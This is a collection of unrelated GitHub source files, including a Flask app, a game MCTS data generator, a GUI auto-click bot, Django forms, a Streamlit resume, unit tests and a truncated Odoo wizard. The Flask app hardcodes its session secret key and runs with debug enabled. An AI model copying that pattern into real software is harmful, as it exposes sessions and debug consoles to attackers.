wraps\napp=Flask(__name__)\napp.secret_key=\"Abhinav154543\"\n\npool_cnxn=mysl_pool_connection(\"mysql_web_data\")\nmycursor=pool_cnxn.cursor()\n\n@app.errorhandler(405)\ndef not_found(e):\n return render_template(\"405.html\",error=e)\n\n@app.errorhandler(404)\ndef not_found(e):\n return render_template(\"404.html\",error=e)\n\n@app.errorhandler(500)\ndef not_found(e):\n return render_template(\"500.html\",error=e)\n\n@app.before_request\ndef before_user():\n if request.path==\"/\":\n return None\n if request.path==\"/auth/login/\":\n return None\n if request.path==\"/auth/signup/\":\n return None\n if request.path==\"/static/custom.css\":\n return None\n if request.path=='/static/custom.js':\n return None\n if request.path=='/test/':\n return None\n if \"user\" not in session:\n msg=\"please logged in !\"\n return render_template('home.html',msg=msg)\n\n@app.route(\"/\")\ndef home():\n return render_template('home.html')\n\n\n\napp.register_blueprint(auth,url_prefix=\"/auth\")\napp.register_blueprint(admin,url_prefix=\"/admin\")\napp.register_blueprint(student,url_prefix=\"/student\")\n\nif __name__==\"__main__\":\n app.run(debug=True)","repo_name":"Abhinavk1243/flask-learning","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1218660591","text":"from src.control.mcts_new import MCTSNew, MCT\nfrom src.game.game import Game, Action\nimport os\nimport random\nimport copy\nimport numpy as np\nimport pickle as pk\nimport time\n\n\n# def training_data_generator():\n# pass\n#\n#\n# def testing_data_generator():\n# pass\n\n\ndef data_generator(size, goal):\n mcts = MCTSNew()\n\n file_name = os.path.dirname(os.path.abspath(__file__)) + \"/data/board_size_%d_goal_%d_train.dat\" % (size, goal)\n # list of game states\n state_data = []\n # list of desired output after softmax\n desired_output = []\n # count = 100\n count = 0\n while count <= 25:\n start = time.time()\n game = Game()\n game.init_board(size=size, goal=goal)\n while not game.game_over[0]:\n # game_over, win = game.game_over\n # if game_over:\n # break\n state_data.append(game.get_board().get_board())\n actions_dict = dict([(act.get_value(), 0.) for act in Action.__members__.values()])\n actions = game.valid_actions()\n\n action_child_pair = {}\n for move in actions:\n state = copy.deepcopy(game)\n root_child = MCT(state=state)\n root_child, _ = mcts.roll_out(root=root_child, state=state, depth=10)\n actions_dict[\n move] = root_child.get_game_state().get_weighted_score() + 2 # for normalizing -1 to 1, differentiating 0\n action_child_pair[move] = root_child\n max_score = np.max([child.get_score() for child in action_child_pair.values()])\n candidates = [action for action, node in action_child_pair.items() if node.get_score() == max_score]\n\n action_scores = np.array(list(actions_dict.values()))\n softmax_scores = [score / np.sum(action_scores) for score in action_scores]\n desired_output.append(softmax_scores)\n\n game.do_action(random.choice(candidates))\n count += 1\n end = time.time()\n print(\"size %d goal %d game %d done, time : %s\" % (size, goal, count, str(end - start)))\n # count -= 1\n\n with open(file_name, \"wb\") as f:\n pk.dump((state_data, desired_output), f)\n\n\nif __name__ == '__main__':\n\n game_sizes = [(3, 128), (3, 256), (4, 512), (4, 1024), (4, 2048)]\n for size, goal in game_sizes:\n print(\"Starting to generate data for game size %d, goal%d\" % (size, goal))\n data_generator(size, goal)\n print(\"Complete generating data\")\n","repo_name":"EmilioLrp/CIS667_2048_game","sub_path":"training_data_generator.py","file_name":"training_data_generator.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"21662270625","text":"from pynput.keyboard import Key, Controller as k_controller\r\nfrom pynput.mouse import Button, Controller as m_controller\r\nimport time\r\nimport tkinter as tk\r\n\r\nkeyboard = k_controller()\r\nmouse = m_controller()\r\n\r\ndoing_something = False\r\nduree_activation = 1 # in hour\r\ntime_between_refresh = 20 # in minutes\r\nt1 = time.time()\r\nt2 = time.time()\r\n\r\nroot = tk.Tk()\r\n\r\n\r\ndef get_entry():\r\n global time_between_refresh\r\n global duree_activation\r\n global doing_something\r\n time_between_refresh = time_between_refresh_entry.get()\r\n duree_activation = duree_activation_entry.get()\r\n # doing_something = doing_something_true.getboolean()\r\n print(time_between_refresh, duree_activation, doing_something)\r\n\r\n\r\ntime_between_refresh_txt = \"\"\r\ntime_between_refresh_label = tk.Label(\r\n root, text=\"temps entre refresh\", font=(\"bold\", 14), pady=20\r\n)\r\ntime_between_refresh_label.grid(row=0, column=0)\r\ntime_between_refresh_entry = tk.Entry(root, textvariable=time_between_refresh_txt)\r\ntime_between_refresh_entry.grid(row=0, column=1)\r\n\r\nduree_activation_txt = \"\"\r\nduree_activation_label = tk.Label(root, text=\"durée d'activation\", font=(\"bold\", 14))\r\nduree_activation_label.grid(row=0, column=3)\r\nduree_activation_entry = tk.Entry(root, textvariable=duree_activation_txt)\r\nduree_activation_entry.grid(row=0, column=4)\r\n\r\ndoing_something_true = tk.Checkbutton(root, text=\"qqc en même temps\")\r\ndoing_something_true.grid(row=1, column=1)\r\ndoing_something_false = tk.Checkbutton(root, text=\"rien en même temps\")\r\ndoing_something_false.grid(row=1, column=3)\r\n\r\nok_btn = tk.Button(root, text=\"Ok\", font=(\"bold\", 14), width=10, command=get_entry)\r\nok_btn.grid(row=2, column=2)\r\n\r\nroot.mainloop()\r\n\r\n# while t2 - t1 < duree_activation * 360:\r\n# keyboard.press(Key.f5)\r\n# keyboard.release(Key.f5)\r\n\r\n# time.sleep(time_between_refresh * 60)\r\n\r\n# t2 = time.time()\r\n\r\n# --- mode if you're doing something at the same time ---\r\nif doing_something:\r\n while t2 - t1 < duree_activation * 360:\r\n count = 0\r\n while count != 50:\r\n mouse.position = (560, 1050)\r\n if count == 49:\r\n mouse.click(Button.left)\r\n count += 1\r\n\r\n time.sleep(0.5)\r\n\r\n count = 0\r\n while count != 50:\r\n mouse.position = (540, 1020)\r\n if count == 49:\r\n mouse.click(Button.left)\r\n count += 1\r\n\r\n time.sleep(0.5)\r\n\r\n keyboard.press(Key.f5)\r\n keyboard.release(Key.f5)\r\n\r\n time.sleep(1)\r\n\r\n keyboard.press(Key.alt_l)\r\n keyboard.press(Key.tab)\r\n keyboard.release(Key.tab)\r\n keyboard.release(Key.alt_l)\r\n\r\n t2 = time.time()\r\n# -------------------------------------------------------\r\n","repo_name":"Wasup52/projects-dump","sub_path":"bot Théo/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3361347811","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.html import strip_tags\n\nfrom subjects.models import Tag\nfrom subjects.forms import ParticipantsMultipleChoiceField\n\nfrom .models import Webpage\n\nfrom file_resubmit.widgets import ResubmitFileWidget\n\nclass WebpageForm(forms.ModelForm):\n subject = None\n students = ParticipantsMultipleChoiceField(queryset = None, required = False)\n \n def __init__(self, *args, **kwargs):\n super(WebpageForm, self).__init__(*args, **kwargs)\n\n self.subject = kwargs['initial'].get('subject', None)\n \n if self.instance.id:\n self.subject = self.instance.topic.subject\n self.initial['tags'] = \", \".join(self.instance.tags.all().values_list(\"name\", flat = True))\n \n self.fields['students'].queryset = self.subject.students.all()\n self.fields['groups'].queryset = self.subject.group_subject.all()\n\n tags = forms.CharField(label = _('Tags'), required = False)\n\n class Meta:\n model = Webpage\n fields = ['name', 'content', 'brief_description', 'all_students', 'students', 'groups', 'show_window', 'visible']\n labels = {\n 'name': _('Webpage name'),\n 'content': _('Webpage content'),\n }\n widgets = {\n 'content': forms.Textarea,\n 'brief_description': forms.Textarea,\n 'students': forms.SelectMultiple,\n 'groups': forms.SelectMultiple,\n }\n\n def clean_name(self):\n name = self.cleaned_data.get('name', '')\n \n topics = self.subject.topic_subject.all()\n\n for topic in topics:\n if self.instance.id:\n same_name = topic.resource_topic.filter(name__unaccent__iexact = name).exclude(id = self.instance.id).count()\n else:\n same_name = topic.resource_topic.filter(name__unaccent__iexact = name).count()\n \n if same_name > 0:\n self._errors['name'] = [_('This subject already has a webpage with this name')]\n\n return ValueError\n\n return name\n\n def clean_content(self):\n content = self.cleaned_data.get('content', '')\n cleaned_content = strip_tags(content)\n \n if cleaned_content == '':\n self._errors['content'] = [_('This field is required.')]\n\n return ValueError\n\n return content\n\n def save(self, commit = True):\n super(WebpageForm, self).save(commit = True)\n\n self.instance.save()\n\n previous_tags = self.instance.tags.all()\n\n tags = self.cleaned_data['tags'].split(\",\")\n\n #Excluding unwanted tags\n for prev in previous_tags:\n if not prev.name in tags:\n self.instance.tags.remove(prev)\n \n for tag in tags:\n tag = tag.strip()\n\n exist = Tag.objects.filter(name = tag).exists()\n\n if exist:\n new_tag = Tag.objects.get(name = tag)\n else:\n new_tag = Tag.objects.create(name = tag)\n\n if not new_tag in self.instance.tags.all():\n self.instance.tags.add(new_tag)\n\n return self.instance\n\nclass FormModalMessage(forms.Form):\n MAX_UPLOAD_SIZE = 10*1024*1024\n\n comment = forms.CharField(widget=forms.Textarea,label=_(\"Message\"))\n image = forms.FileField(widget=ResubmitFileWidget(attrs={'accept':'image/*'}),required=False)\n\n def clean_comment(self):\n comment = self.cleaned_data.get('comment', '')\n cleaned_comment = strip_tags(comment)\n\n if cleaned_comment == '':\n self._errors['comment'] = [_('This field is required.')]\n\n return ValueError\n\n return comment\n\n def clean_image(self):\n image = self.cleaned_data.get('image', False)\n\n if image:\n if hasattr(image, '_size'):\n if image._size > self.MAX_UPLOAD_SIZE:\n self._errors['image'] = [_(\"The image is too large. It should have less than 10MB.\")]\n\n return ValueError\n\n return image","repo_name":"amadeusproject/amadeuslms","sub_path":"webpage/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"10153186234","text":"import subprocess\nimport uuid\nimport os\nimport bs4\n\ncurrent_path=os.path.dirname(__file__)\n\nprint(current_path)\n\nstatic_path=os.path.join(current_path,'static')\n\nprint(static_path)\n\ntemp_path=os.path.join(static_path,'tempfile')\n\ndef combine(path):\n soup = bs4.BeautifulSoup(open(path+\"/hey.html\",'r',encoding='UTF8').read(),features=\"lxml\")\n stylesheets = soup.findAll(\"link\", {\"rel\": \"stylesheet\"})\n for s in stylesheets:\n t = soup.new_tag('style')\n c = bs4.element.NavigableString(open(path+'/'+s[\"href\"],'r',encoding='UTF8').read())\n t.insert(0,c)\n t['type'] = 'text/css'\n s.replaceWith(t)\n\n open(path+\"/result.html\", \"w\",encoding='UTF8').write(str(soup))\n\ndef set_img(path,id):\n soup = bs4.BeautifulSoup(open(path+\"/result.html\",'r',encoding='UTF8').read(),features=\"lxml\")\n\n for img in soup.findAll('img'):\n try:\n img['src'] = r\"{{url_for('\" + 'static' + r\"', filename='tempfile/\" + id + '/' +img['src'] + r\"')}}\"\n except:\n pass\n open(path+\"/result.html\", \"w\",encoding='UTF8').write(str(soup))\n \ndef change_to_html(path):\n\n id=str(uuid.uuid4())\n\n os.mkdir(os.path.join(temp_path,id))\n\n subprocess.check_call(['hwp5html',\"--output\", os.path.join(temp_path, id) , path])\n\n subprocess.check_call(['hwp5html',\"--html\",\"--output\", os.path.join(temp_path,id,\"hey.html\"),path])\n\n combine(os.path.join(temp_path,id))\n\n set_img(os.path.join(temp_path,id),id)\n\n print(id)\n\n return id","repo_name":"0ev/flask-hwp-to-html","sub_path":"hwptohtml.py","file_name":"hwptohtml.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74358468713","text":"from pathlib import Path\n\nimport streamlit as st\nfrom PIL import Image\n\ncurrent_dir = Path(__file__).parent if \"__file__\" in locals() else Path.cwd()\ncss_file = current_dir/ \"styles\" / \"main.css\"\nresume_file = current_dir / \"assets\" / \"CV.pdf\"\nprofile_pic = current_dir / \"assets\" / \"profile-pic.png\"\n\n\n\nPAGE_TITLE = \"Digital Resume | Liburna Mehmeti\"\nPAGE_ICON = \":wave:\"\nNAME = \"Liburna Mehmeti\"\nDESCRIPTION = \"A tech enthusiast skilled in Python, SQL, HTML/CSS, JS, PHP, MySQL, Java, and React Native. I'm passionate about AI and Data Science, and I enjoy teaching programming to kids. I'm seeking a career where I can leverage my expertise in Python and SQL.\"\n\nEMAIL = \"📧mehmetiliburna@gmail.com\"\nSOCIAL_MEDIA = {\n \"LinkedIn\": \"https://www.linkedin.com/in/liburna-mehmeti/\",\n \"GitHub\": \"https://github.com/liburnamehmeti12\",\n}\n\nPROJECTS = {\n \"Weather App\" : \"\" \n}\n\nst.set_page_config(page_title= PAGE_TITLE, page_icon=PAGE_ICON)\n\n\n\nwith open(css_file) as f:\n st.markdown(\"<style>{}</style>\".format(f.read()), unsafe_allow_html=True)\nwith open(resume_file, \"rb\") as pdf_file:\n PDFbyte = pdf_file.read()\nprofile_pic = Image.open(profile_pic)\n\n\ncol1, col2 = st.columns(2, gap=\"small\")\nwith col1:\n st.image(profile_pic, width=300)\n\nwith col2:\n st.title(NAME)\n st.write(DESCRIPTION)\n st.download_button(\n label = \"Download Resume\",\n data = PDFbyte,\n file_name = resume_file.name,\n mime= \"application/octet-stream\"\n )\n\n st.write(EMAIL)\n\n\n\nst.write(\"#\")\ncols = st.columns(len(SOCIAL_MEDIA))\nfor index, (platform, link) in enumerate(SOCIAL_MEDIA.items()):\n cols[index].write(f\"[{platform}]({link})\")\n\n\nst.write(\"---\")\nst.write(\"#\")\nst.header(\"Experience\")\n\nst.subheader(\"General Tech Engineer, Digital School / Shkolla Digjitale (Oct 2021 - Present)\")\nst.write(\n \"\"\"\n - ✔️Providing instruction to a diverse age group (7-18) in programming, encompassing foundational concepts to advanced languages (e.g., PHP, MySQL, Java, Python, WordPress).\n\n - ✔️Overseeing and maintaining the quality of instruction delivered by instructors within the organization.\n\n - ✔️Collaborating on curriculum development to ensure course materials remain current and aligned with evolving technology trends, delivering cutting-edge instruction to students.\n\n \"\"\"\n)\n\n\nst.subheader(\"Social Media Manager, Lia Stublla L.L.C (Jan 2022 - Jul 2022)\")\nst.write(\n \"\"\"\n - ✔️Managed and executed social media strategies for Liastublla, optimizing engagement and increasing brand visibility across various platforms.\n\n\n - ✔️Created and curated content, including text, images, and videos, to maintain a strong online presence and foster audience growth.\n\n\n - ✔️Monitored social media metrics, analyzed performance data, and implemented data-driven improvements to achieve key marketing objectives and enhance the company's online image.\n\n \"\"\"\n)\n\nst.subheader(\"General Menager, KS-EU Agency (Jul 2020 - Jul 2021)\")\nst.write(\n \"\"\"\n - ✔️Oversaw daily operations and service delivery to ensure client satisfaction.\n\n\n - ✔️Led and managed a team, fostering a collaborative work environment and streamlining processes for efficiency.\n\n\n - ✔️Played a key role in business development, establishing partnerships, expanding client relationships, and achieving revenue growth targets.\n\n \"\"\"\n)\n\nst.write(\"#\")\nst.header(\"Qualifications\")\nst.write(\n \"\"\"\n - ✔️ Bachelor's in Computer Science and Engineering (Ongoing)\n\n - ✔️ Gymnasium Graduate (2020)\n \"\"\"\n)\n\nst.write(\"---\")\nst.write(\"#\")\nst.header(\"Certifications\")\nst.write(\"---\")\nst.subheader(\"Junior Programmer\")\nst.write(\"Digital School\")\nst.write(\n \"\"\"\n - HTML CSS & JS\n - PHP & MySQL\n - JAVA\n\n \"\"\"\n)\n\nst.subheader(\"IT Essentials\")\nst.write(\"Cisco\")\n\nst.write(\n \"\"\"\n - Proficiency in troubleshooting and hardware/software fundamentals.\n - Computer maintenance\n - Technical support\n\n \"\"\"\n)\n\nst.subheader(\"Introduction to Python\")\nst.write(\"DataCamp\")\nst.write(\n \"\"\"\n - Python syntax and fundamentals.\n - Understanding of Python data structures.\n - Proficiency in writing Python code\n - Problem-solving skills using Python.\n\n \"\"\"\n)\n\nst.subheader(\"SQL Intermediate\")\nst.write(\"SoloLearn\")\nst.write(\n \"\"\"\n - Proficiency in writing SQL queries for data retrieval and manipulation.\n - Knowledge of database design and schema organization.\n - Ability to perform complex database operations, including joins and subqueries.\n - Skills in managing and optimizing SQL databases for performance.\n\n \"\"\"\n)\n\nst.subheader(\"Python Intermediate\")\nst.write(\"DataCamp\")\nst.write(\n \"\"\"\n - Ability to work with functions, modules, and libraries.\n - Knowledge of database design and schema organization.\n - Competence in handling and manipulating data using Python.\n - Proficient problem-solving skills through Python programming.\n \"\"\"\n)\n\nst.subheader(\"Data Manipulation with Pandas\")\nst.write(\"DataCamp\")\nst.write(\n \"\"\"\n - Data cleaning, transformation, and aggregation using Pandas.\n - Handling missing data effectively.\n - Data visualization with Pandas capabilities.\n - Data export to various formats.\n\n\n \"\"\"\n)\n\n","repo_name":"liburnamehmeti12/Resume","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3327956841","text":"import sys\r\nfrom collections import deque\r\ninput=sys.stdin.readline\r\n\r\n\r\ndef BFS(N):\r\n visited[N]=1\r\n que=deque()\r\n que.append(N)\r\n cnt=2\r\n while que:\r\n a=que.popleft()\r\n for i in graph[a]:\r\n if visited[i]==0:\r\n visited[i]=cnt\r\n cnt+=1\r\n que.append(i)\r\n \r\nN,M,R=map(int,input().split())\r\n\r\ngraph=[[] for i in range(N+1)]\r\n\r\nfor _ in range(M):\r\n A,B=map(int,input().split())\r\n graph[A].append(B)\r\n graph[B].append(A)\r\n\r\nfor i in graph:\r\n i.sort()\r\n\r\nvisited=[0]*(N+1)\r\n\r\n\r\nBFS(R)\r\n\r\nfor i in range(1,len(visited)):\r\n print(visited[i])","repo_name":"sknyuki/Algorithm","sub_path":"백준/Silver/24444. 알고리즘 수업 - 너비 우선 탐색 1/알고리즘 수업 - 너비 우선 탐색 1.py","file_name":"알고리즘 수업 - 너비 우선 탐색 1.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35271220128","text":"from helping_hands_rl_envs.planners.random_planner import RandomPlanner\nfrom helping_hands_rl_envs.planners.play_planner import PlayPlanner\nfrom helping_hands_rl_envs.planners.block_picking_planner import BlockPickingPlanner\nfrom helping_hands_rl_envs.planners.block_stacking_planner import BlockStackingPlanner\nfrom helping_hands_rl_envs.planners.brick_stacking_planner import BrickStackingPlanner\nfrom helping_hands_rl_envs.planners.house_building_1_planner import HouseBuilding1Planner\nfrom helping_hands_rl_envs.planners.house_building_2_planner import HouseBuilding2Planner\nfrom helping_hands_rl_envs.planners.house_building_3_planner import HouseBuilding3Planner\nfrom helping_hands_rl_envs.planners.house_building_4_planner import HouseBuilding4Planner\nfrom helping_hands_rl_envs.planners.improvise_house_building_2_planner import ImproviseHouseBuilding2Planner\nfrom helping_hands_rl_envs.planners.improvise_house_building_3_planner import ImproviseHouseBuilding3Planner\nfrom helping_hands_rl_envs.planners.deconstruct_planner import DeconstructPlanner\n\nAVAILABLE_PLANNER = ['random',\n 'play',\n 'block_picking',\n 'block_stacking',\n 'brick_stacking',\n 'house_building_1',\n 'house_building_2',\n 'house_building_3',\n 'house_building_4',\n 'improvise_house_building_2',\n 'improvise_house_building_3',\n 'house_building_1_deconstruct',\n 'house_building_4_deconstruct',\n 'house_building_x_deconstruct',\n 'improvise_house_building_3_deconstruct',\n 'improvise_house_building_4_deconstruct',\n 'random_picking',\n 'random_stacking']\n\ndef createPlanner(config):\n if 'planner_noise' not in config: config['planner_noise'] = None\n\n if config['planner'] == 'random':\n return lambda env: RandomPlanner(env, config)\n if config['planner'] == 'play':\n return lambda env: PlayPlanner(env, config)\n elif config['planner'] == 'block_picking':\n return lambda env: BlockPickingPlanner(env, config)\n elif config['planner'] == 'block_stacking':\n return lambda env: BlockStackingPlanner(env, config)\n elif config['planner'] == 'brick_stacking':\n return lambda env: BrickStackingPlanner(env, config)\n elif config['planner'] == 'house_building_1':\n return lambda env: HouseBuilding1Planner(env, config)\n elif config['planner'] == 'house_building_2':\n return lambda env: HouseBuilding2Planner(env, config)\n elif config['planner'] == 'house_building_3':\n return lambda env: HouseBuilding3Planner(env, config)\n elif config['planner'] == 'house_building_4':\n return lambda env: HouseBuilding4Planner(env, config)\n elif config['planner'] == 'improvise_house_building_2':\n return lambda env: ImproviseHouseBuilding2Planner(env, config)\n elif config['planner'] == 'improvise_house_building_3':\n return lambda env: ImproviseHouseBuilding3Planner(env, config)\n elif config['planner'] == 'house_building_1_deconstruct':\n return lambda env: DeconstructPlanner(env, config)\n elif config['planner'] == 'house_building_4_deconstruct':\n return lambda env: DeconstructPlanner(env, config)\n elif config['planner'] == 'house_building_x_deconstruct':\n return lambda env: DeconstructPlanner(env, config)\n elif config['planner'] == 'improvise_house_building_3_deconstruct':\n return lambda env: DeconstructPlanner(env, config)\n elif config['planner'] == 'improvise_house_building_4_deconstruct':\n return lambda env: DeconstructPlanner(env, config)\n elif config['planner'] == 'random_picking':\n return lambda env: BlockPickingPlanner(env, config)\n elif config['planner'] == 'random_stacking':\n return lambda env: BlockStackingPlanner(env, config)\n","repo_name":"ondrejbiza/action_priors","sub_path":"ap/helping_hands_rl_envs/planners/planner_factory.py","file_name":"planner_factory.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"73423524392","text":"#!/usr/bin/python3\n\n\"\"\"\nget datetime module from datetime\nget the unittest module\nget os use os.path module to use to check if file exist\nin teardown method to remove it\nget the BaseModel module\n\"\"\"\n\nfrom datetime import datetime\nfrom models.base_model import BaseModel\nimport os\nimport unittest\nimport json\n\n\nclass TestBaseModel(unittest.TestCase):\n \"\"\"\n TestBaseModel class\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\" set up function\"\"\"\n cls.my_model = BaseModel()\n cls.my_model_2 = BaseModel()\n cls.my_model.name = \"My First Model\"\n cls.my_model.my_number = 89\n\n def test_id(self):\n \"\"\" test if id is assigned \"\"\"\n self.assertTrue(TestBaseModel.my_model.id)\n\n def test_id_type(self):\n \"\"\"test id is a string\"\"\"\n self.assertTrue(type(TestBaseModel.my_model.id) == str)\n\n def test_id_uniq(self):\n \"\"\" test id is uniq\"\"\"\n self.assertTrue(TestBaseModel.my_model.id !=\n TestBaseModel.my_model_2.id)\n\n def test_created_at(self):\n \"\"\" test created at is assigned \"\"\"\n self.assertTrue(TestBaseModel.my_model.created_at)\n\n def test_created_at_is_datetime(self):\n \"\"\"\n test created date is datetime instance\n \"\"\"\n self.assertIsInstance(TestBaseModel.my_model.created_at, datetime)\n\n def test_updated_at(self):\n \"\"\" test updated_at at is assigned \"\"\"\n self.assertTrue(TestBaseModel.my_model.updated_at)\n\n def test_updated_at_is_datetime(self):\n \"\"\"\n test updated date is datetime instance\n \"\"\"\n self.assertIsInstance(TestBaseModel.my_model.updated_at, datetime)\n\n def test_str(self):\n \"\"\"test __str__ of an object\"\"\"\n exOutPut = \"[{}] ({}) {}\".format(TestBaseModel.my_model.__class__\n .__name__,\n TestBaseModel.my_model.id,\n TestBaseModel.my_model.__dict__)\n output = str(TestBaseModel.my_model)\n self.assertEqual(output, exOutPut)\n\n def test_save(self):\n \"\"\"\n test save method check if the updated_at value changes\n \"\"\"\n firstUpdatedValue = TestBaseModel.my_model.updated_at\n TestBaseModel.my_model.save()\n secondUpdatedValue = TestBaseModel.my_model.updated_at\n self.assertTrue(type(TestBaseModel.my_model.id) == str)\n self.assertTrue(firstUpdatedValue != secondUpdatedValue)\n \"\"\"\n Test if the save method updates the JSON file.\n \"\"\"\n with open('file.json', 'r') as file:\n obj_dict = json.load(file)\n prev_updated_at = self.my_model.updated_at.isoformat()\n self.my_model.save()\n with open('file.json', 'r') as file:\n updated_obj_dict = json.load(file)\n self.assertNotEqual(prev_updated_at,\n updated_obj_dict['BaseModel.' +\n self.my_model.id]['updated_at'])\n\n \"\"\"\n Test if the save method updates the updated_at attribute.\n \"\"\"\n prev_updated_at = self.my_model.updated_at\n self.my_model.save()\n self.assertNotEqual(prev_updated_at, self.my_model.updated_at)\n\n def test_to_dict_method(self):\n \"\"\"\n test to_dict method\n confirm __class__ is added to the dict\n confirm created_at and updated_at are in isoformat\n \"\"\"\n obj_dict = TestBaseModel.my_model.to_dict()\n self.assertEqual(obj_dict['__class__'], 'BaseModel')\n self.assertEqual(obj_dict['id'], TestBaseModel.my_model.id)\n self.assertEqual(obj_dict['created_at'],\n TestBaseModel.my_model.created_at.isoformat())\n self.assertEqual(obj_dict['updated_at'],\n TestBaseModel.my_model.updated_at.isoformat())\n\n def test_create_BaseModel_Dict(self):\n \"\"\"\n Test creating BaseModel from dictionary\n \"\"\"\n my_dict = TestBaseModel.my_model.to_dict()\n my_model = BaseModel(my_dict)\n self.assertTrue(my_model.id)\n self.assertIsInstance(my_model.created_at, datetime)\n self.assertIsInstance(my_model.updated_at, datetime)\n self.assertTrue(my_model.id !=\n TestBaseModel.my_model_2.id)\n\n def tearDown(self):\n \"\"\"\n Set up teardown method\n \"\"\"\n if os.path.exists(\"file.json\"):\n os.remove(\"file.json\")\n\n\nif __name__ == \"__main__\":\n \"\"\"\n if test is executed it runs as main\n but if it is imported it does not execute\n \"\"\"\n unittest.main()\n","repo_name":"joekariuki3/AirBnB_clone","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18436844870","text":"\"\"\"\nCreated on 2019-09-15\n@author: Ricardo Padrino - github.com/rpadrino - IMDEA Networks\n\"\"\"\nfrom __future__ import division\n\nimport math\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport numpy as np\nimport sys\nimport re #regular expresions\n\nimport pandas as pd\n\n# functions\n## lambda function to human readable sort (to avoid problems)\n## ex: rectangle100 .. rectangle80 --> rectangle80 .. rectangle100\ndef natural_sort(ll):\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]\n return sorted(ll, key = alphanum_key)\n\n\ndef countFiles(path):\n count_imgs = 0\n\n for file_name in listdir( path ):\n if isfile( join( path, file_name ) ):\n count_imgs+=1\n\n total_files = count_imgs\n\n return total_files\n\n\n\ndef getSegmentsAsDataframe(crops_folder_path):\n\n # counter and variables\n nframe = 0 # it will be updated to 1 in the first loop\n vid_name_prev = \"\"\n\n df = pd.DataFrame( columns=('filename', 'frame', 'x1', 'y1', 'x2', 'y2', 'detection-acc') )\n\n\n if os.path.exists( crops_folder_path ):\n for file_name in natural_sort( listdir( crops_folder_path ) ):\n file_name_wpath = join( crops_folder_path, file_name )\n\n if isfile( file_name_wpath ):\n\n #mac files\n if file_name.startswith('.DS_Store'):\n continue\n\n if not file_name.lower().endswith('jpg') and not file_name.lower().endswith('jpeg') \\\n and not file_name.lower().endswith('png') and not file_name.endswith('bmp') :\n continue\n\n # espected format: IMG_20190513_153057rectangleX_X_X_X\n # espected format: IMG_20190513_153057yYYYYYYrectangleX_X_X_X\n ## VS\n # espected format: IMG_20190513_153057rectangleX_X_X_X_acc0.999\n # espected format: IMG_20190513_153057YYYYYYrectangleX_X_X_X_acc0.999\n ## VS\n # espected format: IMG_20190513_153057frame2rectangleX_X_X_X_acc0.999\n # espected format: IMG_20190513_153057YYYYYYframe2rectangleX_X_X_X_acc0.999\n\n #now format - 20191028\n #20191028_141559_909402\n #[IMG_20190807_103944.634547.PNG]\n\n filename_splitted = file_name.split(\"rectangle\")\n vid_name = filename_splitted[0] #prevoiusly needed for frame number\n\n nframe = int(filename_splitted[0].split(\"frame\")[-1])\n\n #WRONG #frame_coords_info = filename_splitted[-1].split(\".\")[0].split(\"acc\")[0] #X_X_X_X_acc.ext -> X_X_X_X_\n frame_coords_info = filename_splitted[-1].split(\"acc\")[0] #[_]X_X_X_X[_]accZ.ZZ.ext -> [_]X_X_X_X[_]\n if frame_coords_info.startswith('_'): #just in case\n frame_coords_info = frame_coords_info[1:]\n\n if frame_coords_info.endswith('_'): #for acc\n frame_coords_info = frame_coords_info[1:]\n\n coords = frame_coords_info.split(\"_\")\n coords = list(map(int, coords))\n\n acc_retina = filename_splitted[-1].split(\"acc\")[-1] #Z.ZZ.ext\n #rfind: last occurrence\n acc_retina = float( acc_retina[:acc_retina.rfind(\".\")] ) #Z.ZZ\n\n\n #inserting new entry\n #FILENAME, FRAME-NUMBER, X1, Y1, X2, Y2, ACC\n df.loc[ 0 if pd.isnull( df.index.max() ) else df.index.max() + 1 ] = [file_name] + [int(nframe)] + list(coords) + [acc_retina]\n #[int(coords[0])] + [int(coords[1])] + [int(coords[2])] + [int(coords[3])]\n\n #for-end\n\n df.insert(0,'ii', df.index)\n\n return df\n","repo_name":"GCGImdea/Symbiosis","sub_path":"optical-classification/mod_read_crop_files.py","file_name":"mod_read_crop_files.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18216899890","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Thesis bike shop\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\nimport openerp.addons.decimal_precision as dp\nfrom datetime import datetime\nimport urllib\nimport csv\nimport time\n\nclass init_update_task_squence(osv.osv_memory):\n _name = \"init.update.task.squence\"\n \n _columns = {\n 'amount': fields.float('Amount Compensation'),\n 'task_value': fields.float('Task Value'),\n 'tasks_ahead': fields.float('Tasks Ahead'),\n }\n \n def onchange_amount(self, cr, uid, ids, amount, context):\n result = 0\n customer_id = False\n task_id = context.get('active_id', False)\n \n task_obj = self.pool.get('project.task')\n inoive_obj = 